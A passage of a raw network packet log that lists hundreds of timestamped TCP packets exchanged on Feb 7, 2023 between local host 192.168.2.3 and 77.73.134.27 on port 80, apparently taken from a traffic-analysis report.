                                                                                    Feb 7, 2023 19:44:50.886645079 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.886666059 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.886674881 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.886687994 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.886718988 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.886723042 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.886749983 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.886779070 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.886796951 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.886805058 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.886833906 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.886840105 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.886873007 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.886879921 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.886904955 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.886912107 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.886936903 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.886941910 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.886960983 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.886970997 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.886990070 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.887001038 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.887018919 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.887028933 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.887046099 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.887056112 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.887073994 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.887085915 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.887101889 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.887113094 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.887130976 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.887140036 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.887157917 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.887168884 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.887185097 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.887202978 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.887214899 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.887232065 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.887248993 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.887259007 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.887275934 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.887286901 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.887305021 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.887314081 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.887331963 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.887343884 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.887362003 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.887375116 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.887388945 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.887403965 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.887419939 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.887433052 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.887448072 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.887461901 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.887479067 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.887490034 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.887506962 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.887520075 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.887532949 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.887561083 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.887573004 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.887593985 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.887604952 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.887628078 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.887650967 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.887659073 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.887671947 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.887702942 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.887726068 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.887759924 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.887780905 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.887788057 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.887803078 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.887820005 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.887831926 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.887852907 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.887862921 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.887887001 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.887898922 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.887919903 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.887929916 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.887953997 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.887963057 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.887988091 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.887999058 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.888041973 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.888053894 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.888076067 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.888087034 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.888112068 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.888122082 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.888147116 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.888159037 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.888180971 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.888192892 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.888216972 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.888226986 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.888252974 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.888264894 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.888287067 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.888298035 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.888319969 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.888333082 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.888354063 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.888362885 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.888390064 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.888401031 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.888425112 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.888437033 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.888458967 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.888468981 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.888490915 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.888503075 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.888525963 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.888536930 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.888561964 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.888571978 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.888597012 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.888608932 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.888631105 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.888641119 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.888664961 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.888676882 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.888699055 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.888710976 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.888731956 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.888741970 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.888767004 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.888777018 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.888803005 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.888813019 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.888837099 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.888845921 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.888870001 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.888886929 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.888904095 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.888915062 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.888982058 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.888994932 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.889015913 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.889025927 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.889050007 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.889060974 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.889094114 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.889095068 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.889132023 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.889143944 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.889164925 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.889174938 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.889203072 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.889210939 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.889238119 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.889247894 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.889271021 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.889281988 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.889303923 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.889316082 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.889337063 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.889347076 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.889370918 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.889383078 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.889404058 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.889415979 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.889437914 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.889450073 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.889471054 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.889482021 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.889504910 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.889514923 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.889539003 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.889549017 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.889573097 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.889585018 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.889605999 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.889620066 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.889637947 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.889652014 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.889671087 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.889683962 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.889703989 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.889714956 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.889738083 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.889750004 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.889770031 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.889780998 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.889803886 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.889816046 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.889837980 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.889870882 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.889897108 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.889897108 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.889899015 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.889914989 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.889930964 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.889944077 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.889964104 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.889976025 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.889997959 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.890011072 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.890032053 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.890043974 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.890065908 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.890077114 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.890100002 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.890110970 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.890135050 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.890149117 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.890167952 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.890178919 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.890202999 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.890212059 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.890237093 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.890247107 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.890273094 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.890285015 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.890305996 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.890317917 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.890340090 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.890351057 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.890373945 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.890387058 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.890405893 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.890419006 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.890438080 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.890464067 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.890487909 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.890515089 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.890536070 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.890561104 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.890585899 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.892113924 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.892833948 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.918184042 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.918226004 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.918251991 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.918282032 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.918284893 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.918366909 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.918366909 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.918786049 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.918821096 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.918849945 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.918868065 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.918869019 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.918881893 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.918900013 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.918924093 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.918942928 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.918953896 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.918978930 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.918991089 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.919009924 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.919020891 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.919050932 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.919058084 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.919080973 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.919092894 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.919110060 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.919116974 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.919138908 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.919142008 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.919162989 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.919219017 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.919584990 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.919620991 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.919641972 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.919656992 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.919684887 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.919687033 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.919708967 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.919718981 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.919738054 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.919754028 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.919778109 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.919792891 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.919809103 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.919835091 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.919845104 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.919866085 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.919887066 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.919903040 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.919924974 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.919933081 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.919954062 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.919962883 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.919981956 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.919996023 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.920012951 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.920027971 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.920044899 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.920070887 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.920077085 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.920100927 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.920125008 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.920135975 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.920156002 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.920166016 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.920195103 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.920200109 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.920226097 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.920238972 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.920260906 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.920321941 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.933034897 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.933074951 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.933103085 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.933131933 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.933147907 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.933163881 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.933195114 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.933196068 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.933228970 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.933248043 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.933267117 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.933319092 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.933469057 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:51.114459991 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:51.344983101 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:51.419327974 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:51.669002056 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:51.669296980 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:52.132853031 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:52.133016109 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:53.061001062 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:53.061534882 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:54.853183985 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:54.853424072 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:55.933762074 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:55.956302881 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.956345081 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.956373930 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.956403017 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.956454992 CET804969877.73.134.27192.168.2.3
